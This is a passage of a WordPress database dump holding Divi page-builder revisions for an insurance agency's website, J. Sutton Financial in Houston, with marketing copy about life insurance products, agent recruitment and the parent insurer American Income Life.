_module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" header_2_text_align=\"center\" header_2_text_color=\"#000000\" sticky_enabled=\"0\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" always_center_on_mobile=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"left\" custom_margin=\"|||0px||\" custom_margin_tablet=\"|||0px||\" custom_margin_phone=\"|||0px||\" custom_margin_last_edited=\"on|desktop\" custom_padding=\"|||0px||\" animation_direction=\"left\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|phone\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" width_tablet=\"75%\" width_phone=\"75%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 22:02:22','2023-04-08 22:02:22','',138,'http://cmdev-site1.com/?p=895',0,'revision','',0),(902,3,'2023-04-09 13:32:41','2023-04-09 13:32:41','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Products &amp; Services</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_padding=\"20px|||||\" animation_style=\"flip\" animation_direction=\"right\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" header_text_color=\"#003372\" header_2_text_color=\"#003372\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" parallax=\"on\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_url\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" box_shadow_style_button=\"preset2\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-09 13:32:41','2023-04-09 13:32:41','',26,'http://cmdev-site1.com/?p=902',0,'revision','',0),(896,1,'2023-04-08 22:04:14','2023-04-08 22:04:14','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Products &amp; Services</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_padding=\"20px|||||\" animation_style=\"flip\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" module_alignment_last_edited=\"on|desktop\" module_alignment_phone=\"center\" module_alignment_tablet=\"center\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" header_text_color=\"#003372\" header_2_text_color=\"#003372\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" parallax=\"on\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_url\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" box_shadow_style_button=\"preset2\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 22:04:14','2023-04-08 22:04:14','',26,'http://cmdev-site1.com/?p=896',0,'revision','',0),(897,1,'2023-04-08 22:10:31','2023-04-08 22:10:31','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" menu_icon_color=\"#FFFFFF\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" logo_width_tablet=\"75%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|tablet\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" hover_enabled=\"0\" menu_font_tablet=\"||||||||\" menu_font_phone=\"||||||||\" menu_font_last_edited=\"on|phone\" menu_text_color_tablet=\"\" menu_text_color_phone=\"\" menu_text_color_last_edited=\"on|phone\" background_layout_tablet=\"light\" background_layout_phone=\"light\" background_layout_last_edited=\"on|tablet\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"off|desktop\" menu_text_color__hover=\"#003372\" mobile_menu_text_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website 